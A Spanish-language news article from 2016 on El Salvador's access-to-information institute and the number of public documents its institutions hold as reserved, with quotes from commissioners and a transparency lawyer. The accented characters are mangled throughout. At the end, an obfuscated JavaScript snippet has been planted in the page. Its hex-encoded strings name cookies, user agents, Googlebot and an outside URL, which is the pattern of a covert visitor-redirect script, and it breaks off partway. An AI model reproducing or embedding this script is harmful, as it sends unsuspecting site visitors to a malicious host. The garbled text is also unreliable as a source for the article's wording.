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21 Jun 2016
Destacado en Inicio | Por: Redacción

A?Por quAi?? un caso puede ser reservado y cA?mo afecta a la transparencia del paAi??s segA?n la IAIP?

En El Salvador, de acuerdo a un estudio realizado por el Instituto de Acceso a la InformaciA?n PA?blica (IAIP), hay 4 mil 997 documentos reservados en la actualidad. Sin embargo, el problema radica en que algunos de estos documentos a pesar de pertenecer a 71 instituciones pA?blicas, no tiene comprobados sus motivos de reserva.

Toda la informaciA?n reservada debe ser justificada por ai???amenazar efectivamente el interAi??s jurAi??dicamente protegidoai??? o ai???que el daAi??o que pudiera producirse con la liberaciA?n de la informaciA?n fuere mayor que el interAi??s pA?blico por conocer la informaciA?n en referenciaai???, segA?n lo estipula el artAi??culo 20 de la Ley de Acceso a la InformaciA?n PA?blica (LAIP).

La reserva injustificada por parte de las instituciones pA?blicas ha sido criticada por el IAIP, ya que es considerada excesiva e innecesaria. ai???SerAi??a problemA?tico que se estAi??n haciendo Ai??ndices de reserva sin un sustento legal, que sean Ai??ndices elaborados de manera antojadiza y no con la suficiente base legal para que esta pueda sostenerseai???, afirmA? la comisionada del IAIP, Herminia Funes.

Cabe destacar que el perAi??odo que la ley establece para un documento en reserva es de siete aAi??os, segA?n lo establece el artAi??culo 20 de la LAIP. Sin embargo, se puede ampliar por cinco aAi??os mA?s, a discreciA?n del IAIP.

Campos agregA? ai???cada instituciA?n tiene la autonomAi??a y la independencia para elaborar su propio Ai??ndice, el cual debe remitirse al instituto, tal como lo dice el artAi??culo 23 de la LAIP, en el que se detalla que nosotros debemos llevar un registro centralizadoai???.

Sin embargo, la abogada de Funde-ALAC, CapAi??tulo Transparencia Internacional, Xenia HernA?ndez, estableciA? que cada instituciA?n crea Ai??ndices genAi??ricos de informaciA?n reservada y que el IAIP solamente es un ente receptor ai???la ley no nos faculta para poder examinar el fondo de cada Ai??ndice de informaciA?n reservada, es decir, la ley no nos da la facultad para poder revisar el contenido mismo de las declaratoria de reserva, ni mucho menos para desclasificar la informaciA?nai???.

En el artAi??culo 19 de la LAIP se menciona todo tipo de informaciA?n que puede ser considerada como reservada: ai???los planes militares y las negociaciones polAi??ticas que se deban mantener en reservaai???; ai???la que perjudique o ponga en riesgo a la defensa nacional y seguridad pA?blicaai???; ai???la que menoscabe las relaciones internacionales o la conducciA?n de negociaciones diplomA?ticas del paAi??sai??? y ai???la que ponga en peligro la vida, seguridad o salud de cualquier personaai???

El comisionado del IAIP, Jaime Campos, expresA?: ai???el abuso en las declaratorias de reserva se patentiza cuando las instituciones del Estado no prueban el daAi??o que se producirAi??a revelar esa informaciA?n a la categorAi??a o bien jurAi??dico que pretende proteger con la reservaai???.

TambiAi??n el art. 19 enumera ai???la que contenga opiniones o recomendaciones que formen parte del proceso deliberativo de los servidores pA?blicos, en tanto no sea adoptada la decisiA?n definitivaai???; ai???la que causare un serio perjuicio en la prevenciA?n, investigaciA?n o persecuciA?n de actos ilAi??citos en la administraciA?n de justicia o en la verificaciA?n del cumplimiento de las leyesai???; ai???la que comprometiere las estrategias y funciones estatales en procedimientos judiciales o administrativos en cursoai??? y ai???la que pueda generar una ventaja indebida a una persona en perjuicio de un terceroai???.

Entre las instituciones pA?blicas que se destacan dentro del estudio son: el Ministerio de EducaciA?n (MINED) con 761 documentos en reserva; 571 a cargo del Fondo Social para la Vivienda (FSV); la Corte de Cuentas de la RepA?blica (CCR), con 516; el Fondo de Saneamiento y Fortalecimiento Financiero (FOSAFFI) posee 395; y 230 a nombre del Instituto SalvadoreAi??o de Desarrollo Municipal (ISDEM).

El Ministerio de Medio Ambiente y Recursos Naturales (MARN), el Viceministerio de Transporte (VMT) y el Instituto SalvadoreAi??o para el Desarrollo Integral de la NiAi??ez y Adolescencia (Isna) no poseen restricciones sobre su informaciA?n.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== 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